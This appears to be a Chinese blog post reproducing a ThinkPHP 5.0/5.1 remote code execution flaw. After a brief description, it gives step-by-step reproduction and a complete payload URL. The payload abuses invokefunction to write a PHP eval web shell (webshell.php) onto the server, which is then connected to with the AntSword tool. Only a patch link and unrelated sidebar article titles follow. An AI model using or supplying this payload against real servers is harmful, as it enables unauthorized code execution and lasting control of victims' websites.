thinkphp命令执行漏洞(CVE-2018-1002015)

漏洞描述:

ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。

复现过程:

1.访问ip:port

2.抓包,修改get请求

Payload

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

3.蚁剑连接

修复建议:

用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-29 12:10:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-29 12:10:03       100 阅读
  3. 在Django里面运行非项目文件

    2023-12-29 12:10:03       82 阅读
  4. Python语言-面向对象

    2023-12-29 12:10:03       91 阅读

热门阅读

  1. 相比于其他流处理技术,Flink的优点在哪?

    2023-12-29 12:10:03       48 阅读
  2. Linux实现ssh公钥登录的步骤

    2023-12-29 12:10:03       60 阅读
  3. linux firewalld简介

    2023-12-29 12:10:03       62 阅读
  4. 面试经典150题(55-58)

    2023-12-29 12:10:03       55 阅读
  5. 【数据库】PostgreSQL中的DISTINCT ON和DISTINCT的区别

    2023-12-29 12:10:03       59 阅读
  6. MD5算法

    MD5算法

    2023-12-29 12:10:03      60 阅读
  7. 编程语言的未来?

    2023-12-29 12:10:03       53 阅读
  8. SpringBoot 中实现订单30分钟自动取消的策略

    2023-12-29 12:10:03       59 阅读
  9. Redis使用中的常见问题及解决方案

    2023-12-29 12:10:03       63 阅读